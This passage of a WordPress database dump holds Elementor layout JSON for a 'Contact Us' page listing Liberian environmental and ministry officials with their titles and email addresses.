href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\nConservation Manager, FDA\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong>\\n\\nDirector, Ministry of Agriculture\\n\\n<a href=\\\"mailto:Fwmwah1958@yahoo.com\\\">Fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong>\\n\\nAssist. Minister, Ministry of Mines and Energy\\n\\n<a href=\\\"mailto:John.willabo@yahoo.com\\\">John.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong>\\nLand Use Management Manager, LLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14814,2350,'_elementor_edit_mode','builder'),(14815,2350,'_elementor_template_type','wp-page'),(14816,2350,'_elementor_version','2.7.5'),(14817,2350,'_wp_page_template','default'),(14818,2350,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\nConservation Manager, FDA\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet